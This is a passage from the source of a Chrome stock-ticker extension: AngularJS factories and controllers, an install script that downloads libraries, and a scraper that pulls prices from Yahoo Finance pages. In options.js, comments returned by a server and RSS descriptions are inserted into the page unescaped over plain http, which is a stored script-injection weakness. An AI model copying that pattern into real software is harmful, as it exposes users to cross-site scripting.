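*
* @param string varName
* Cache key name to store the metrics under.
* @param object metrics
* An object with metric names as each property. See getCache() for
* details.
*
* @return void
*/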
api.setCache = function(varName, metrics) {
// Write cache to local object.
pvt.cache[varName] = {
timestamp: new Date().getTime(),
metrics: metrics
};
// Write cache to google storage.
var data = {};
var cacheKey = 'cache_' + varName;
data[cacheKey] = JSON.stringify(pvt.cache[varName]);
chrome.storage.local.set( data , function() {
if (chrome.runtime.lastError) {
console.log('Failed to save: ' + chrome.runtime.lastError.message);
} else {
console.log('Saved ' + cacheKey + '.');
}
});
};
/**
* @param string varName
* The variable name.
* @param function callback
* A callback function to invoke when results are ready.
*
* @return void
* Invokes callback function with arguments:
* metrics (array)
* An array of metrics keyed by metric name such as:
* { 'Price': { timestamp: int, value: mixed } }
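*
* Example usage (a sketch; assumes a 'Price' metric is defined in the
* resource):
* @code
* api.getMetrics('WMT', function(metrics) {
* console.log(metrics['Price'].value);
* });
* @endcode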
*/
api.getMetrics = function(varName, callback) {
var replacements = [
{ from: 'SYMBOL', to: varName }
];
this.getCache(varName, function(cache) {
// Cache for 2 hours.
if ((typeof(cache) != 'undefined') && (cache.timestamp + 2 * 60 * 60 * 1000) > new Date().getTime()) {
console.log('Loading from factory cache ' + varName);
if (callback) callback.call(this, cache.metrics);
} else {
// Slow down multiple requests.
var time = new Date().getTime();
if ((time - 1000) > pvt.lastFetch) {
pvt.delayFetch = 0;
} else {
pvt.delayFetch = (pvt.delayFetch * 1.25) + 500;
}
var parent = this;
var cstResource = new CSTResource(resource.getData());
var localDelay = pvt.delayFetch;
pvt.lastFetch = time;
$timeout(function() {
console.log('Fetching ' + varName + ' @ ' + localDelay);
cstResource.fetchAllMetrics(replacements, function(metrics) {
parent.setCache(varName, metrics);
if (callback) callback.call(parent, metrics);
});
}, localDelay);
}
});
};
return api;
}]);
/**
* Model to manage configuration for displaying variables.
*/
cstApp.factory('variableConfig', ['$rootScope', 'variable', 'resource', 'appMeta', function($rootScope, variable, resource, appMeta) {
/**
* Private data and methods. These are not directly accesible to
* controllers or other factory services.
*/
var pvt = {
data: {
// An array of objects, each defining a metric that should be
// displayed when a variable is rendered. See addItem() for object
// details.
items: []
}
};
/**
* Ensure a metric display item contains only valid properties and values.
*
* @param object item
* Metric to be displayed when a variable is rendered. Valid properties:
* - name: (string) A full name of a resource metric.
* - source: (string) The text to display above the metric.
*
* @return object
* An object with properties:
* - success: (bool) true on success, false otherwise.
* - message: (string) will be set on failure to clean otherwise null.
* - item: (object) will be set on success. The cleaned item with
* properties:
* - name: (string) A full name of a resource metric.
* - source: (string) The text to display above the metric.
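*
* Example usage (a sketch; assumes a resource metric named 'Price'
* exists):
* @code
* var result = pvt.cleanItem({ name: 'Price', source: 'Price' });
* if (!result.success) console.log(result.message);
* @endcode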
*/
pvt.cleanItem = function(item) {
var cleanItem = {
name: item.name,
source: item.source
};
if (resource.getMetricNames().indexOf(cleanItem.name) == -1)
return { success: false, message: 'Invalid resource metric name: ' + cleanItem.name };
if (!item.source.length)
return { success: false, message: 'Invalid abbreviation text: ' + cleanItem.name };
return { success: true, item: cleanItem };
};
/**
* Add a metric to be displayed when a variable is rendered.
*
* @param object item
* See pvt.cleanItem() for object details.
*
* @return object
* An object with properties:
* - success: (bool) true on success, false otherwise.
* - message: (string) will be set on failure.
*/
pvt.addItem = function(item) {
var result = this.cleanItem(item);
if (result.success) {
this.data.items.push(result.item);
return { success: true, message: null };
}
return result;
};
/**
* Clean up the data object, or construct a new one.
*
* @param object data
* (optional) An existing data object to clean, such as one loaded
* from chrome storage, or imported via the gui. Properties:
* - loaded: (bool) true if the data object came from storage or other
* code, false if this data object is new.
* - lastSave: (int) last time this object was saved.
* - lastUpdate: (int) last time updates were checked for.
* - version: (string) application version at the time of last save.
* - autoUpdate: (bool) true if object should automatically add
* new data found in default data object or/and poll a remote source
* for updates.
* - alwaysDisplay: (bool) true if variable bar should always been
* displayed even if no variables detected on page.
* - items: (array) Collection of metric objects to show when
* displaying a variable. See cleanItem() for object details.
*
* @return object
* An object (report) with properties:
* - success: (bool) true on if object was valid, false if object
* required cleaning.
* - message: (string) will be set to the last issue resolved if
* object required cleaning.
* - data: (object) A links object safe for storage and use,
* even if properties are empty. See @param data for object
* details.
*/
pvt.cleanData = function(data) {
// Default report to return.
var report = { success: true, message: null, data: null };
// Default empty object.
var cleanData = {
loaded: false,
lastSave: 0,
lastUpdate: 0,
version: appMeta.version,
autoUpdate: true,
alwaysDisplay: false,
items: []
};
if (typeof(data) != 'undefined') {
cleanData.loaded = true;
if (typeof(data.lastSave) != 'undefined') cleanData.lastSave = data.lastSave;
if (typeof(data.lastUpdate) == 'number') cleanData.lastUpdate = data.lastUpdate;
if (typeof(data.autoUpdate) == 'boolean') cleanData.autoUpdate = data.autoUpdate;
if (typeof(data.alwaysDisplay) == 'boolean') cleanData.alwaysDisplay = data.alwaysDisplay;
if (typeof(data.version) == 'string') cleanData.version = data.version;
if (typeof(data.items) != 'undefined') {
for (var i in data.items) {
var result = this.cleanItem(data.items[i]);
if (result.success) {
cleanData.items.push(result.item);
} else {
report.success = false;
report.message = result.message;
}
}
}
}
report.data = cleanData;
return report;
};
/**
* Set data object to a new value.
*
* This will trigger a broadcast update.
*
* @param object data
* see cleanData() for object details.
* @param object broadcastData
* see broadcastUpdate() for object details.
*
* @return object
* An object (result) with properties:
* - success: (bool) true on success, false on failure.
* - message: (string) if success is false then this will be set to
* the last issue found when validating data object.
*/
pvt.setData = function(data, broadcastData) {
// Make sure the data object is constructed properly.
var result = this.cleanData(data);
if (result.success) {
this.data = result.data;
api.broadcastUpdate(broadcastData);
}
return result;
};
/**
* Setup initial values when this factory is run for the very first time
* ever (not every time the extension loads).
*/
pvt.setup = function() {
this.setData();
var result = this.addItem({ "name": "Price", "source": "Price" });
if (!result.success)
console.log(result.message);
api.save();
};
/**
* Public api.
*/
var api = {};
api.setData = function(data, broadcastData) {
return pvt.setData(data, broadcastData);
};
api.getData = function() {
return JSON.parse(JSON.stringify(pvt.data));
};
api.setup = function() {
return pvt.setup();
}
/**
* Add a metric to be displayed when a variable is rendered.
*
* This will trigger a variable configuration broadcast update.
*
* @param object item
* See pvt.cleanItem() for object details.
*
* @return object
* An object with properties:
* - success: (bool) true on success, false otherwise.
* - message: (string) will be set on failure.
*/
api.addItem = function(item) {
var result = pvt.addItem(item);
if (!result.success) return result;
this.broadcastUpdate();
return { success: true, message: null }
};
/**
* Remove a metric from being displayed when a variable is rendered.
*
* This will trigger a variable configuration broadcast update.
*
* @param int index
* The array index of the metric to remove.
*
* @return void
*/
api.removeItem = function(index) {
pvt.data.items.splice(index, 1);
this.broadcastUpdate();
};
/**
* Broadcast that the variable display configuration was updated.
*
* Controllers may listen for this with:
* $scope.$on('variableConfigUpdate', function(event, data) {});
*
* @param object data
* An object to broadcast to the rootScope.
* - apply: (bool) true to instruct watchers that they should manually
* resync with $scope.$apply(). This may need to be done if the
* broadcast was originally triggered by chrome.storage methods. This
* is probably a hack; a better solution exists somewhere.
*/
api.broadcastUpdate = function(data) {
if (typeof(data) == 'undefined') {
data = { apply: false };
}
$rootScope.$broadcast('variableConfigUpdate', data);
};
/**
* Save the current variable display configuration to chrome storage.
*
* @param function callback
* A function callback to be invoked when save is done with arguments:
* result (object)
* - success: (bool) true if save was successful, false otherwise.
* - message: (string) will be set if success is false.
*/
api.save = function(callback) {
var parent = this;
chrome.storage.sync.set( {'tickerbar': this.getData()} , function() {
if (typeof(callback) != 'undefined') {
if (chrome.runtime.lastError) {
if (typeof(callback) == 'function')
callback({ success: 0, message: chrome.runtime.lastError.message });
} else {
parent.broadcastUpdate();
if (typeof(callback) == 'function')
callback({ success: 1, message: null });
}
}
});
};
// When factory is first instantiated pull the variable display
// configuration object out of chrome storage. This will result
// in a broadcast update.
chrome.storage.sync.get(['tickerbar'], function(result) {
if (chrome.runtime.lastError) {
console.log('Could not load variable config from chrome storage: ' + chrome.runtime.lastError.message);
} else {
if (typeof(result['tickerbar']) == 'undefined') {
setTimeout(function() {
api.setup();
}, 1000);
}
// @todo remove this hack after a week or so. Add buttons to manually clear var cache. Add 48 hour cache clear.
variable.removeAllCache(chrome.storage.sync);
var config = pvt.cleanData(result['tickerbar']).data;
var result = api.setData(config, { apply: true } );
if (!result.success) {
console.log('Could not apply variable config from chrome storage: ' + result.message);
console.log(config);
}
}
});
// Listen for any updates to the variable display configuration object
// in chrome storage. This should only happen if multiple browsers are
// open, or if extension code on the other side of the javascript
// firewall (popup versus options versus content) has written a change
// to storage.
chrome.storage.onChanged.addListener(function(object, namespace) {
for (key in object) {
if (key == 'tickerbar') {
var config = pvt.cleanData(object.tickerbar.newValue).data;
var result = api.setData(config, { apply: true } );
if (!result.success) {
console.log('Could not apply variable config from chrome storage: ' + result.message);
console.log(config);
}
}
}
});
return api;
}]);
<file_sep>/js/pattern/patternDirective.js
cstApp.directive('cstPatternsConfig', function() {
return {
restrict: 'E',
controller: 'patternsConfig',
replace: true,
scope: true,
templateUrl: chrome.extension.getURL('/js/pattern/template/pattern-config.html')
};
});
<file_sep>/options/options.js
var evil_global_var_comments = [];
function ajaxComments(query, callback) {
var url = 'http://www.automatonsofmisery.com/chrome-stock-ticker/server/comments/index.php';
query = JSON.stringify(query);
$.post(url, { json: query }, function(response, textStatus, jqXHR) {
if (typeof(callback) == 'function') callback(response);
}).fail(function() {
console.log('FAIL');
});
}
function getComments(callback) {
var json = {
namespace: 'comments',
command: 'get_comments'
};
ajaxComments(json, callback);
}
function printComments() {
getComments(function(response) {
var json = JSON.parse(response);
var output = '';
for (var i in json['comments']['comments']) {
output += '<div class="comment">' + json['comments']['comments'][i]['comment'] + '</div>';
}
$('div.comment-wrapper div.comments').html(output);
});
}
function addComment(comment, callback) {
var json = {
namespace: 'comments',
command: 'add_comment',
comment: comment
};
ajaxComments(json, callback);
}
$(document).ready(function() {
$.get('http://www.automatonsofmisery.com/money/feed/', function (data) {
var output = '';
var count = 0;
$(data).find("item").each(function () {
var el = $(this);
output = output + "<h4 class=\"title\">" + el.find("title").text() + "</h4>\n";
output = output + "<div class=\"date\">" + el.find("pubDate").text() + "</div>\n";
output = output + "<div class=\"description\">" + el.find("description").text() + "</div>\n";
count++;
if (count >= 3)
return false;
});
$('div#dashboard .news .items').html(output);
});
printComments();
setInterval(function() {
printComments();
}, 30000);
$('div.comment-wrapper button').click(function() {
var comment = $('div.comment-wrapper div.comment textarea').val();
addComment(comment);
$('div.comment-wrapper div.comment textarea').val('');
setTimeout(function() {
printComments();
}, 1000);
});
});
<file_sep>/js/pattern/patternCtrl.js
cstApp.controller('patternsConfig', ['$scope', 'resource', 'patterns', function($scope, resource, patterns) {
// Provide some default patterns.
$scope.patterns = patterns.getData();
$scope.export = { pretty: false };
$scope.addPattern = { regex: '', modifiers: '', result: '' };
$scope.$on('patternsUpdate', function(event, data) {
$scope.patterns = patterns.getData();
if (data.apply) $scope.$apply();
});
$scope.add = function() {
var result = patterns.addItem({
regex: $scope.addPattern.regex,
modifiers: $scope.addPattern.modifiers,
result: $scope.addPattern.result
});
if (!result.success) {
$('#saveConfirmPatterns').html('<div class="alert alert-danger"><a class="close" data-dismiss="alert">x</a>Failed to add pattern: '+result.message+'</div>');
} else {
$scope.addPattern = { regex: '', modifiers: '', result: '' };
}
};
$scope.remove = function(index) {
patterns.removeItem(index);
};
$scope.export = function() {
var patternsObject = JSON.stringify(patterns.getData(), null, ($scope.export.pretty * 4));
$('.cst-patterns-config .cst-import-export textarea').val(patternsObject);
}
$scope.save = function() {
var result = patterns.setPatterns($scope.patterns);
if (result.success) {
patterns.save(function(result) {
if (result.success) {
$('#saveConfirmPatterns').html('<div class="alert alert-success"><a class="close" data-dismiss="alert">x</a>Saved!</div>');
} else {
$('#saveConfirmPatterns').html('<div class="alert alert-danger"><a class="close" data-dismiss="alert">x</a>Failed to save: '+result.message+'</div>');
}
});
} else {
$('#saveConfirmPatterns').html('<div class="alert alert-danger"><a class="close" data-dismiss="alert">x</a>Failed to save: '+result.message+'</div>');
}
};
}]);
<file_sep>/js/bootstrap/bootstrapDirective.js
/**
* Include this at the top of each page.
*
* <cst-bootstrap></cst-bootstrap>
*/
cstApp.directive('cstBootstrap', function() {
return {
restrict: 'E',
controller: 'bootstrap',
replace: true,
scope: true,
templateUrl: chrome.extension.getURL('/js/bootstrap/template/bootstrap.html')
};
});
<file_sep>/scripts/install.sh
PWD=`pwd`
if [[ "$PWD" == *"/scripts" ]]; then
echo "Script must be run from repository base."
exit 1
fi
if [ -d "libs/external" ]; then
echo "Install script has already been run. Remove libs/external directory to run again."
exit 1
fi
mkdir libs/external
echo "Downloading jquery"
mkdir libs/external/jquery
curl -L --progress-bar -o libs/external/jquery/jquery.min.js http://code.jquery.com/jquery-1.8.3.min.js
echo "Downloading angularjs"
mkdir libs/external/angular
curl -L --progress-bar -o libs/external/angular/angular.min.js http://code.angularjs.org/1.2.2/angular.min.js
echo "Downloading angular-ui-utils"
cd libs/external
bower install angular-ui-utils\#v0.1.1
cd ../..
echo "Downloading bootstrap"
mkdir libs/external/bootstrap
curl -L --progress-bar -o libs/external/bootstrap/bootstrap.zip https://github.com/twbs/bootstrap/archive/v3.0.3.zip
unzip libs/external/bootstrap/bootstrap.zip -d libs/external/bootstrap > /dev/null
echo "Namespacing bootstrap css"
lessc libs/cst-bootstrap.less > libs/cst-bootstrap.css
<file_sep>/js/variable/variableCtrl.js
cstApp.controller('variable', ['$scope', 'variable', 'variableConfig', function($scope, varServ, varConfigServ) {
/**
* Provided by directive:
* $scope.variable: (string) (optional) Name of the variable.
* $scope.header: (bool) Display metric names above values.
* $scope.value: (bool) Display the metric values.
*/
$scope.bar = varConfigServ.getData();
$scope.metrics = {};
if (typeof($scope.variable) != 'undefined') {
varServ.getMetrics($scope.variable.toUpperCase(), function(metrics) {
$scope.metrics = metrics;
$scope.$apply();
});
}
$scope.$on('variableConfigUpdate', function(event, data) {
$scope.bar = varConfigServ.getData();
if (data.apply) $scope.$apply();
});
}]);
cstApp.controller('variableConfig', ['$scope', 'resource', 'variableConfig', function($scope, resource, varConfig) {
$scope.tickerbar = { items: [] };
$scope.optionsMetricNames = [{ metricIndex: '- Select Metric -', metricValue: '- Select Metric -' }];
$scope.addMetricName = '- Select Metric -';
$scope.$on('variableConfigUpdate', function(event, data) {
$scope.tickerbar = varConfig.getData();
if (data.apply) $scope.$apply();
});
$scope.$on('resourceUpdate', function() {
var data = resource.getData();
$scope.optionsMetricNames = [{ metricIndex: '- Select Metric -', metricValue: '- Select Metric -' }];
$.each(data.metrics, function(index, value) {
$scope.optionsMetricNames.push({ metricIndex: value.name, metricValue: value.name });
});
$scope.$apply();
});
$scope.itemAdd = function() {
var result = varConfig.addItem({ name: $scope.addMetricName, source: 'Metric' });
if (!result.success) {
$('#saveConfirmTickerBar').html('<div class="alert alert-danger"><a class="close" data-dismiss="alert">x</a>Failed to add metric: '+result.message+'</div>');
}
}
$scope.itemRemove = function(index) {
varConfig.removeItem(index);
}
$scope.save = function() {
var result = varConfig.setData($scope.tickerbar);
if (result.success) {
varConfig.save(function(result) {
if (result.success) {
$('#saveConfirmTickerBar').html('<div class="alert alert-success"><a class="close" data-dismiss="alert">x</a>Saved!</div>');
} else {
$('#saveConfirmTickerBar').html('<div class="alert alert-danger"><a class="close" data-dismiss="alert">x</a>Failed to save: '+result.message+'</div>');
}
});
} else {
$('#saveConfirmTickerBar').html('<div class="alert alert-danger"><a class="close" data-dismiss="alert">x</a>Failed to save: '+result.message+'</div>');
}
};
}]);
<file_sep>/libs/CSTResource.js
/**
* @file
* Retrieve individual and discrete pieces of information from the internet.
* A mapping between the name of a discrete piece of information (metric)
* and the URL and css selector to obtain the metric is maintained inside
* a single JSON object. Multiple metrics are mapped inside the single JSON
* object.
*
* Long term storage of this mapping and the caching of the results are
* left to the calling class.
*
* URLs may contain variables, for which the calling class is responsible
* for passing in replacement values when required.
*
* Example fetching of price and volume for a stock ticker:
* @code
* // Setup a resource object to retrieve 'price' and 'volume' data from
* // the yahoo finance page.
* var resource_obj = {
* urls: [
* { url: 'http://finance.yahoo.com/q?s=SYMBOL' }
* ],
* metrics: [
* {
* name: 'price',
* url: 'http://finance.yahoo.com/q?s=SYMBOL',
* selector: 'span.time_rtq_ticker span',
* regex: '([0-9\.]+)'
* },
* {
* name: 'volume',
* url: 'http://finance.yahoo.com/q?s=SYMBOL',
* selector: 'table#table2 tr:nth-child(3) td.yfnc_tabledata1 span'
* },
* ]
* };
* // Replace all 'SYMBOL' variables in the above resource_obj urls with 'WMT' (Walmart
* // stock ticker).
* var replacements = [
* { from: 'SYMBOL', to: 'WMT' }
* ];
* var resource = new CSTResource(resource_obj, null);
* resource.fetchAllMetrics(replacements, function() {
* // Fetching metrics is an asyncronous process. Inside this callback we
* // know all metrics have been fetched and are available.
* var price = resource.cache.metrics['price'].value;
* });
* @endcode
*/
/**
* @param object resource
* A JSON object mapping metrics (a piece of information) to resources on
* the internet (resources are specified with a url and a css selector).
* @param object cache
* (optional) Preloaded cache object that contains the results of the
* previous fetching of all metrics.
*/
CSTResource = function(resource, cache) {
if (typeof(resource) == 'undefined') resource = CSTResource.getDefaultResource();
if (!this.validResource(resource)) throw 'Provided resource JSON is not valid.';
this.resource = resource;
// Store results of metric fetching.
this.cache = {
urls: {},
metrics: {}
};
if (typeof(cache) != 'undefined' && cache !== null) this.cache.metrics = cache;
};
/**
* Fetch a URL from the internet.
*
* This is an async method call. The results will be stored in cache.
*
* @param string url
* The url to access.
* @param object params
* An object containing parameters, like:
* { name: 'name', password: '<PASSWORD>' }
* @param object callback
* A callback function. Function will be invoked when the ajax request
* has been completed.
*
* @return void
* No return value is provided, use callback function to receive the html
* returned by the ajax request.
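*
* Example usage (a sketch; the url is illustrative):
* @code
* resource.fetchUrl('http://finance.yahoo.com/q?s=WMT', {}, function(html) {
* console.log('Fetched ' + html.length + ' characters.');
* });
* @endcode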
*/
CSTResource.prototype.fetchUrl = function(url, params, callback) {
// Return the cached copy if it exists.
if (typeof(this.cache.urls[url]) != 'undefined') {
callback.call(this, this.cache.urls[url].html);
} else {
var thisCSTResource = this;
var xhr = new XMLHttpRequest();
xhr.onreadystatechange = function() {
if (xhr.readyState == 4) {
// Record a cached copy of the url's contents.
thisCSTResource.cache.urls[url] = {};
thisCSTResource.cache.urls[url].html = xhr.responseText;
thisCSTResource.cache.urls[url].timestamp = new Date().getTime();
callback.call(thisCSTResource, xhr.responseText);
}
}
xhr.open("GET", url, true);
xhr.send();
}
}
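/**
* Fetch all URLs required by all metrics in the resource.
*
* This is an async method call. The results will be stored in cache.
*
* @param array replacements
* An array of replacement values for variables in the urls. See
* replaceUrlVars() for object details.
* @param object callback
* A callback function. Invoked with the url cache once every url has
* been fetched.
* @param bool flush
* (optional) Present for signature consistency; currently unused.
*
* @return void
*/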
CSTResource.prototype.fetchAllUrls = function (replacements, callback, flush) {
var urls = this.getMetricUrls();
var fetching = urls.slice();
for (var i=0; i<urls.length; i++) {
// Wrap each iteration in a closure so the async callback sees its own
// url value rather than the final value of the loop variable.
(function(parent, url) {
var actual_url = parent.replaceUrlVars(url, replacements);
parent.fetchUrl(actual_url, {}, function() {
// Record the end of async call to fetch url. When the last url
// has been retrieved, and the array empty, then the callback will
// be invoked.
fetching.splice(fetching.indexOf(url), 1);
if (!fetching.length) callback.call(this, this.cache.urls);
});
})(this, urls[i]);
}
}
/**
* Report all URLs required by all metrics in the resource.
*
* @return array
* An array of URLs.
*/
CSTResource.prototype.getMetricUrls = function() {
var urls = [];
for (var i=0; i<this.resource.metrics.length; i++) {
var metric = this.resource.metrics[i];
if ($.inArray(metric.url, urls) === -1) urls.push(metric.url);
}
return urls;
};
/**
* Report any metrics in the resource that depend on a specific url.
*
* @return array
* An array of metric objects.
*/
CSTResource.prototype.getMetricsByUrl = function(url) {
var metrics = [];
for (var i=0; i<this.resource.metrics.length; i++) {
var metric = this.resource.metrics[i];
if (metric.url == url) metrics.push(metric);
}
return metrics;
};
/**
* Report a metric object by specified name.
*
* @param string name
* The name of the metric.
*
* @return object|null
* The metric object which is using the name or null on not found.
*/
CSTResource.prototype.getMetricByName = function(name) {
var response = null;
for (var i=0; i<this.resource.metrics.length; i++) {
var metric = this.resource.metrics[i];
if (metric.name == name) {
response = metric;
break;
}
}
return response;
};
/**
* Determine if a resource JSON object is valid or not.
*
* @param object resource
* The resource JSON object to check.
*
* @return bool
* true if the object is formatted well, false otherwise.
*/
CSTResource.prototype.validResource = function (resource) {
return true;
};
/**
* Determine if a cache JSON object is valid or not.
*
* @param object cache
* The cache JSON object to check.
*
* @return bool
* true if the object is formatted well, false otherwise.
*/
CSTResource.prototype.validCache = function (cache) {
return true;
};
/**
* Retrieve all metric values.
*
* @param array replacements
* An array of replacement values for variables in the metric.url
* @param object callback
* A callback function to invoke when the metric has been parsed and a
* value is available.
* @param bool flush
* (optional) Flush the cache.
*
* @return void
* No return value is provided, use callback function to receive an array
* of objects conaining the metric name and retrieved value, like:
* { name: 'price', value: '92.22' }
*/
CSTResource.prototype.fetchAllMetrics = function (replacements, callback, flush) {
var thisCSTResource = this;
var fetching = this.resource.metrics.length;
for (var i=0; i<this.resource.metrics.length; i++) {
var metric = this.resource.metrics[i];
this.fetchMetric(metric, replacements, function() {
// Record the end of async call to fetch metric. When the last metric
// has been retrieved, and the array empty, then the callback will be
// invoked.
fetching = fetching - 1;
if (!fetching) callback.call(this, this.cache.metrics);
}, flush);
}
}
/**
* Retrieve metric value by accessing the metric url and using the selector.
* A cached copy of the URL and metric value will be maintained. All url
* fetches are made asyncronously.
*
* @param object metric
* The metric object to parse.
* @param array replacements
* An array of replacement values for variables in the metric.url
* @param object callback
* A callback function to invoke when the metric has been parsed and a
* value is available.
* @param bool flush
* (optional) Flush the cache.
*
* @return void
* No return value is provided; use the callback function to receive the
* value found in the html document.
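*
* Example usage (a sketch; the metric shape matches getDefaultResource()):
* @code
* resource.fetchMetric(
* { name: 'price',
* url: 'http://finance.yahoo.com/q?s=SYMBOL',
* selector: 'span.time_rtq_ticker span' },
* [ { from: 'SYMBOL', to: 'WMT' } ],
* function(value) { console.log('price: ' + value); }
* );
* @endcode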
*/
CSTResource.prototype.fetchMetric = function (metric, replacements, callback, flush) {
if (typeof(flush) == 'undefined') flush = false;
// Get the value by fetching the url and parsing the response if it has not
// already been cached, or flush is specified, or the cache is older than
// 4 hours.
if ((typeof(this.cache.metrics[metric.name]) == 'undefined') || flush
|| (this.cache.metrics[metric.name].timestamp + 4 * 60 * 60 * 1000) < new Date().getTime()) {
var url = this.replaceUrlVars(metric.url, replacements);
this.fetchUrl(url, {}, function(html) {
html = html.replace(/<img[^>]*>/g, '');
html = html.replace(/<script[^>]*>.*?<\/script>/g, '');
html = html.replace(/<script[^>]*>/g, '');
var value = $(html).find(metric.selector).text();
if ((typeof(metric.regex) != 'undefined') && metric.regex.length) {
var regex = new RegExp(metric.regex, 'g');
var match;
if ((match = regex.exec(value)) !== null) {
value = match[1];
}
}
this.cache.metrics[metric.name] = {};
this.cache.metrics[metric.name].value = value;
this.cache.metrics[metric.name].timestamp = new Date().getTime();
callback.call(this, value);
}, flush);
// Get the value from cache.
} else {
var value = this.cache.metrics[metric.name].value;
callback.call(this, value);
}
};
/**
* Replace variables in a URL string.
*
* Does not depend on instance state.
*
* @param string url
* The url to replace variables in.
* @param array replacements
* Objects containing variable names and their replacement value, like:
* { from: 'varName', to: 7 }
*
* @return string
* The url with variables replaced.
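*
* Example usage (a sketch):
* @code
* var url = resource.replaceUrlVars('http://finance.yahoo.com/q?s=SYMBOL',
* [ { from: 'SYMBOL', to: 'WMT' } ]);
* // url is now 'http://finance.yahoo.com/q?s=WMT'
* @endcode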
*/
CSTResource.prototype.replaceUrlVars = function (url, replacements) {
for (var i=0; i<replacements.length; i++) {
var replacement = replacements[i];
url = url.replace(replacement.from, replacement.to);
}
return url;
};
/**
* Generate a default resource object.
*
* Static method.
*/
CSTResource.getDefaultResource = function () {
var resource = {
urls: [
{ url: 'http://finance.yahoo.com/q?s=SYMBOL' }
],
metrics: [
{ name: 'price', url: 'http://finance.yahoo.com/q?s=SYMBOL', selector: 'span.time_rtq_ticker span' },
{ name: 'volume', url: 'http://finance.yahoo.com/q?s=SYMBOL', selector: 'table#table2 tr:nth-child(3) td.yfnc_tabledata1 span' },
]
};
return resource;
};
<file_sep>/js/lists/listsFactory.js
/**
* @file
* All factories for use with lists of variables. A list is nothing more than
* a predefined collection of variables.
*/
cstApp.factory('lists', ['$rootScope', 'appMeta', function($rootScope, appMeta) {
/**
* Private data and methods.
*/
var pvt = {};
/**
* Ensure an individual list object contains only valid properties and
* values.
*
* If any properties contain invalid data it will be removed. If the removal
* results in an invalid item then the overall result will be considered
* a failure; the item is unusable and should be discarded by the calling
* code.
*
* @param object item
* Describes a collection of variables and meta data describing the
* collection:
* - name: (string) Name of the list.
* - variables: (array) An array of strings, each being a single
* variable.
*
* @return object
* An object with properties:
* - success: (bool) true on success, false otherwise.
* - message: (string) will be set on failure to clean otherwise null.
* - item: (object) will be set on success. The cleaned item. See
* @param object item for details.
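*
* Example usage (a sketch; the list name and symbols are illustrative):
* @code
* var result = pvt.cleanItem({ name: 'Watchlist', variables: ['WMT', 'KO'] });
* if (result.success) itemList.push(result.item);
* @endcode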
*/
pvt.cleanItem = function(item) {
var name = '';
var variables = [];
if (typeof(item) != 'undefined') {
if (typeof(item.name) == 'string') name = item.name;
if (Object.prototype.toString.call(item.variables) === '[object Array]') variables = item.variables;
}
var cleanItem = {
name: name,
variables: variables,
};
if (!cleanItem.name.length)
return { success: false, message: 'Invalid item name: ' + item.name, item: cleanItem };
return { success: true, message: null, item: cleanItem };
};
/**
* Clean up the data object, or construct a new one.
*
* @param object data
* (optional) An existing data object to clean, such as one loaded
* from chrome storage, or imported via the gui. Properties:
* - loaded: (bool) true if the data object came from storage or other
* code, false if this data object is new.
* - lastSave: (int) last time this object was saved.
* - lastUpdate: (int) last time updates were checked for.
* - version: (string) application version at the time of last save.
* - autoUpdate: (bool) true if object should automatically add
* new data found in default data object or/and poll a remote source
* for updates.
* - useDefault: (bool) true if the application's default lists should
* be used.
* - items: (object) Container for individual collections of lists:
* - default: (array) Collection of individual lists. Each object
* defines a set of variables, with associated meta data on for
* the list itself. See cleanItem() for object details. These
* lists are only created and managed by the application.
* - custom: (array) Same as default, but created and managed by the
* end user.
*
* @return object
* An object (report) with properties:
* - success: (bool) true on if object was valid, false if object
* required cleaning.
* - message: (string) will be set to the last issue resolved if
* object required cleaning.
* - data: (object) A lists object safe for storage and use,
* even if properties are empty. See @param data for object
* details.
*/
pvt.cleanData = function(data) {
// Default report to return.
var report = { success: true, message: null, data: null };
// Default empty object.
var cleanData = {
loaded: false,
lastSave: new Date().getTime(),
lastUpdate: 0,
version: appMeta.version,
autoUpdate: true,
useDefault: true,
items: {
default: [],
custom: []
}
};
if (typeof(data) != 'undefined') {
cleanData.loaded = true;
if (typeof(data.lastSave) != 'undefined') cleanData.lastSave = data.lastSave;
if (typeof(data.lastUpdate) == 'number') cleanData.lastUpdate = data.lastUpdate;
if (typeof(data.autoUpdate) == 'boolean') cleanData.autoUpdate = data.autoUpdate;
if (typeof(data.useDefault) == 'boolean') cleanData.useDefault = data.useDefault;
if (typeof(data.version) == 'string') cleanData.version = data.version;
// Clean items. If in invalid item is found then disregard it.
if (typeof(data.items) != 'undefined') {
for (var i in data.items) {
if (Object.prototype.toString.call(data.items[i]) === '[object Array]') {
for (var j in data.items[i]) {
var result = this.cleanItem(data.items[i][j]);
if (result.success) {
cleanData.items[i].push(result.item);
} else {
report.success = false;
report.message = result.message;
}
}
}
}
}
}
report.data = cleanData;
return report;
};
/**
* Add a list to an array of lists.
*
* @param object item
* See cleanItem() for object details.
* @param array itemList
* An array of item objects. See cleanItem() for object details.
* @param bool broadcast
* Set to true if a broadcast update should be issued.
*
* @return object
* An object with properties:
* - success: (bool) true on success, false otherwise.
* - message: (string) will be set on failure.
*/
pvt.addItem = function(item, itemList, broadcast) {
var result = this.cleanItem(item);
if (result.success) {
itemList.push(result.item);
if (broadcast) this.broadcastUpdate();
return { success: true, message: null }
}
return result;
};
/**
* Remove a list item from an array of list of items.
*
* @param int index
* The array index of the item to remove.
* @param array itemList
* An array of item objects. See cleanItem() for object details.
* @param bool broadcast
* Set to true if a broadcast update should be issued.
*
* @return void
*
* @todo Add error checking and a normalized return object.
*/
pvt.removeItem = function(index, itemList, broadcast) {
itemList.splice(index, 1);
if (broadcast) this.broadcastUpdate();
};
/**
* Report any conflicting properties of a potential new item to an
* existing array of items.
*
* @param object item
* See cleanItem() for object details.
* @param array itemList
* An array of item objects. See cleanItem() for object details.
*
* @result object
* An object (exists) with a property for each property in the item
* object parameter (i.e: regex):
* - regex: (array) An array of objects each with the properties:
* - index: (int) The items index in the list where the conflict was
* found.
* - item: (object) The item that a property conflict was found on.
*
* Example usage:
* @code
* var result = pvt.compareItem({ regex: '[A-Z]' }, itemList);
 *   // Check if any duplicates on the regex pattern were found.
* if (typeof(result['regex']) != 'undefined') {
* // Remove the duplicate item from the list.
* pvt.removeItem(result['regex'][0]['index'], itemList);
* }
* @endcode
*/
pvt.compareItem = function(item, itemList) {
var exists = {};
for (var key in item) {
for (var i in itemList) {
if (item[key] == itemList[i][key]) {
if (typeof(exists[key]) == 'undefined')
exists[key] = [];
exists[key].push({ index: i, item: itemList[i] });
}
}
}
return exists;
};
/**
* Get a copy of the data object.
*
* @return object
* See cleanData() for object details.
*/
pvt.getData = function() {
return JSON.parse(JSON.stringify(this.data));
};
/**
* Broadcast that the data object was updated.
*
* Controllers may listen for this with:
 *   $scope.$on('listsUpdate', function(event, data) {});
*
* @param object data
